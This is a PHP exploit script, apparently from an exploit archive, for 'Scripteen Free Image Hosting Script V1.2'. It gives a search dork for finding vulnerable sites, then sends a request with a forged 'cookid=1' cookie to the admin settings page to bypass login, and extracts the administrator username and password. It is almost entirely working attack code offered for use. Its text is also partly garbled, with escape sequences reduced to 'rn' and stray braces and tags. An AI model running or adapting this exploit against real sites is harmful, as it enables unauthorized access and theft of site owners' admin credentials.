/*
Coded By RMx - Liz0zim
BiyoSecurity.Com & Coderx.org
Ki zava Ki Zava :)
Thanx : Crackers_Child - TR_IP - Volqan - All SQL Low3rz
*/
error_reporting("E_ALL");
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$desen='|value="(.*)"|siU';
function yolla($host,$paket)
{
global $veri;
$ac=fsockopen(gethostbyname($host),80);
if (!$ac) {
echo 'Unable to connect to server '.$host.':80'; exit;//Bağlanamaz ise
}
fputs($ac,$paket);
$veri="";
while (!feof($ac)) {
$veri.=fread($ac,1);
}
fclose($ac);
}
?>
Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit
Coded By RMx - Liz0ziM
Dork:"Powered by Scripteen Free Image Hosting Script V1.2"
$host=$_POST[host];
$klasor=$_POST[klasor];
$admin=$_POST[admin];
$p=$klasor."admin/settings.php";
echo 'Sending Exploit..
';
$packet ="GET ".$p." HTTP/1.0rn";
$packet.="Host: ".$host."rn";
$packet.="Cookie: cookid=1rn";
$packet.="Connection: Closernrn";
yolla($host,$packet);
preg_match_all($desen,$veri,$cik);
$ad=$cik[1][0];
$sifre=$cik[1][1];
if($ad AND $sifre){
echo '
Exploit succeeded...
Admin Username:'.$ad.'
Admin Password:'.$sifre.'
';
}
else
{
echo 'Exploit Failed !';
}
}
?>
